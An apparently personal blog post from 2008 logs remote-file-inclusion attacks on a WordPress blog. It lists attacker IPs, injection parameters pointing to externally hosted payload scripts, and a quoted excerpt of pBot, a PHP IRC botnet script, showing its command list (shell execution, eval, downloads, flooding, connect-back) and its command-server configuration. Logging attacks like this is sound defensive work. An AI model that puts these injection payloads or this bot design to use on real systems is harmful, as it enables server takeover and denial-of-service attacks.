-
-
Today’s we just upgrade from WordPress 2.3.2 to 2.3.3 security release. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts ↓. The first attacker is from 212.24.62.200 → udkado.ru masking their useragent as Googlebot (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the attacker data to abuse network and IronPort. The next few hours we received 20 attack from the same bot-herder. They probably has a large scale of DDNS (china → korea → us ). Noticeably the scans pattern is predictable. From our Feb 5th attack all these botnet is targeting certain search keywords security, injection so we setup a honey-pot right on that particular URL.
Hacking Attempts on Kakkoi
Sort by Injection type.
IP / DDNS UA ATT Country Params 212.24.62.200 Googlebot 1 Russia - www.yahoo.com
- Request URI: www.yahoo.com
61.152.158.46 N/A 4 China - http://basiclifesaving.org/mycomments/rom.txt
- http://www.freewebtown.com/acc827/test.txt
- Request URI: /security/injection/
N/A 16 - http://basiclifesaving.org/mycomments/rom.txt
- http://www.freewebtown.com/acc827/test.txt
- Request URI: /security/injection/
The Bot-herder Host
Part of class pBot source taken from http://basiclifesaving.org/mycomments/rom.txt
<? /* * * #crew@corp. since 2003 * edited by: devil__ <admin@xdevil.org> * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the bot * .restart //restart the bot * .mail <to> <from> <subject> <msg> //send an email * .dns <IP|HOST> //dns lookup * .download <URL> <filename> //download a file * .exec <cmd> // uses exec() //execute a command * .sexec <cmd> // uses shell_exec() //execute a command * .cmd <cmd> // uses popen() //execute a command * .info //get system information * .php <php code> // uses eval() //execute php code * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack * .raw <cmd> //raw IRC command * .rndnick //change nickname * .pscan <host> <port> //port scan * .safe // test safe_mode (dvl) * .inbox <to> // test inbox (dvl) * .conback <ip> <port> // conect back (dvl) * .uname // return shell's uname using a php function (dvl) * */ set_time_limit(0); error_reporting(0); echo "Ok unlocker. We did i!"; class pBot { var $config = array("server"=>"Bucharest.ro.eu.ultra-chat.org", "port"=>"6667", "pass"=>"n", "prefix"=>"[R]", "maxrand"=>"4", "chan"=>"#unlocker", "chan2"=>"#unlocker", "key"=>"n", "modes"=>"+p", "password"=>"n", "trigger"=>".", "hostauth"=>"Robert.users.ultra-chat.org" // * for any hostname (remember: /setvhost xdevil.org) );Related Posts
- Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008
- Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan
External Links
-
- February 6, 2008 at 10:59 pm
- February 7, 2008 at 6:44 pm
- 0.3
- url
-
-
-
No Responses to “Daily Hacking Attemps on blog.kakkoi.net - Feb 6th, 2008”
Trackback URL: Use the TrackBack url ↑ to ping this article. If your blog does not support Trackbacks you might want to leave a comment instead.
-
-
"write as if you were talking to a good friend (in front of your mother)."
.haveyoursay
Disclaimer: For any content that you post, you hereby grant to Kakkoi the royalty-free, irrevocable, perpetual, exclusive and fully sublicensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, perform and display such content in whole or in part, world-wide and to incorporate it in other works, in any form, media or technology now known or later developed. Some rights reserved.
-
The following "Code" are designed to protect you and other users of this site.
In order to keep these experiences enjoyable and interesting for all of our users, we ask that you follow the above guidlines.
be the first to comment.